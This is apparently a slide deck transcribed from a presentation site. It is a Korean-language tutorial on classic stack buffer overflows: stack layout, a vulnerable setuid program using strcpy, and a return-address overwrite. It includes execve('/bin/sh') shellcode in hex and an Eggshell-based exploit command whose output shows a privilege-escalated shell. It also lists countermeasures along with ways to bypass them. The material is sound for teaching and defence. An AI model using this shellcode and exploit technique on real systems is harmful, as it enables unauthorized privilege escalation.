230 likes | 370 Views
Basic of Buffer Over Flow. S.S.G 방승원. Agenda. Introduction Memory Structure Stack Structure while Example Target Program Ready & Attack Attack & Security Application of Overflow. Introduction. Overflow ?? 넘치다 , 넘쳐 흐르다 ; 범람하다 ; < 용기 등이 > 가득 차다 , 넘치다 Buffer Over Flow ??
E N D
Basic of Buffer Over Flow S.S.G 방승원
Agenda • Introduction • Memory Structure • Stack Structure while Example • Target Program • Ready & Attack • Attack & Security • Application of Overflow
Introduction • Overflow ?? • 넘치다, 넘쳐 흐르다;범람하다; • <용기 등이> 가득 차다, 넘치다 • Buffer Over Flow ?? • 정해진 메모리보다 많은 데이터를 입력 받아 특정 영역을 덮음으로써 프로그램 흐름을 바꿔 공격자가 원하는 코드를 실행하는 공격 • <Phrack Magazine 49-14>, Aleph One
Memory Structure LOW TEXT • TEXT : Program Code • DATA : Static Variable Global Variable • HEAP : Dynamic Allocation • STACK Dynamic Varbiable Local Variable DATA HEAP STACK HIGH
Stack Structure Memory LOW (0x08048000) Stack HIGH STACK • LIFO(Last In First Out) • PUSH • POP • SP(Stack Pointer) • BP(Base Pointer) PUSH POP C B SP Stack LOW Memory HIGH (0xbfffffff) A BP
Example Program #include <stdio.h> void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() { func(1, 2, 3); printf(“Hello, World!\n”); }
Example Program Memory LOW (0x08048000) Stack HIGH STACK #include <stdio.h> void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() { func(1, 2, 3); printf(“Hello, World!\n”); } buf2 buf1 Stack Frame Pointer Return Address 1 2 ESP Stack LOW Memory HIGH (0xbfffffff) 3 EBP
Example Program Memory LOW (0x08048000) Stack HIGH STACK main: pushl $3 pushl $2 pushl $1 call func addl $16, %esp func: pushl %ebp movl %esp, %ebp subl $40, %esp leave (pop %ebp ret buf2 buf1 Dummy Stack Frame Pointer Return Address 1 2 ESP Stack LOW Memory HIGH (0xbfffffff) 3 EBP
Target Program #include <stdio.h> #include <string.h> void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) { func(argv[1]); printf(“Hello, World\n”); } • argc, argv • 프로그램을 실행 할 때 인자를 입력받는 방법 • ex) ./target bang 1234 • argv = 3; • argv[0] = “target”; • argv[1] = “bang”; • argv[2] = “1234”; • strcpy(dest, src) • src가 가르키는 문자열을 dest로 복사 • * 크기 제한이 없어 • overflow취약점 발생
Target Program • Setuid Bit 가 걸려있음 Set User ID Bit(number – 4000) $ chmod 4755 target (or chmod u+s) -rwsr-xr-x 1 level1 level1 target 어떤 사용자든지 이 target을 실행할 땐 level1 유저권한을 갖게 됨 ex) passwd • Redhat 9.0, Kernel 2.4.32, gcc 3.2.2-5
Target Program • Let’s Run program With a lot of ‘A’ Character!!! • Result : Segmentation Fault • Why??
Target Program Memory LOW (0x08048000) Stack HIGH STACK #include <stdio.h> #include <string.h> void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) { func(argv[1]); printf(“Hello, World\n”); } buf Dummy SFP RET ESP Stack LOW Memory HIGH (0xbfffffff) str = argv[1] EBP
Target Program Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x71'` 64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Normal
Target Program Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x72'` 64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Overflow
Target Program Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x80'` 64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ AAAA ][ AAAA ][ BBFFFFBB ] Stack LOW Stack HIGH Real Overflow
Target Program Memory LOW (0x08048000) Stack HIGH STACK func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func addl $16, %esp subl $12, %esp A A A A A A A A A Dummy SFP [ BFFFFFBF ] RET [ BBFFFF08 ] E SP Stack LOW Memory HIGH (0xbfffffff) str E BP
Target Program Memory LOW (0x08048000) Stack HIGH STACK func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func addl $16, %esp subl $12, %esp A A A A A A A A A 0x41414141(??) Dummy [ AAAA ] SFP [ AAAA ] RET [ AAAA ] E SP Stack LOW Memory HIGH (0xbfffffff) str E BP
Shell Code • 쉘을 실행해주는 코드 #include <unistd.h> void main() { char *shell[2]; setreuid(3001, 3001); shell[0] = "/bin/sh"; shell[1] = NULL; execve(shell[0], shell, NULL); } 어셈코드 "\x31\xc0\x31\xdb\x31\xc9\x66\xbb” “\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46” “\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88” ”\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3” ”\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31” ”\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";
Attack Ready • Segmentation Fault 확인 • 쉘코드 제작 • 쉘코드를 버퍼에다 넣었을 때, 그 버퍼의 주소를 찾아야 됨 • But, 버퍼의 주소를 추측하기가 어려움 • 그러므로 쉘 환경 변수에 쉘코드를 넣어서 사용하여 쉘코드의 주소를 계산해 주는 Eggshell 사용
Attack bash-2.05b$ ./egg 512 200 Using address: 0xbffffa60 bash-2.05b$ ./target `perl -e 'print "A"x76';(printf "\x60\xfa\xff\xbf")` sh-2.05b$ id uid=3001(level1) gid=1000(guest) groups=1000(guest) sh-2.05b$
Attack V.S Security • Non-executable Stack Return Into Libc Omega Project • Stack Guard and Stack Shield Bypass Stack Guard and Stack Shield • Random Stacks • Exec Shield(커널수준) Exec Shield 회피 • strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf() 등 사용 자제 -> strncpy() strncat() 사용 • And so on………
Application of Overflow • Windows, Unix, Linux, Mac • Local, Remote • Web -> ActiveX • Heap Overflow • Integer Overflow • Frame Pointer Overwrite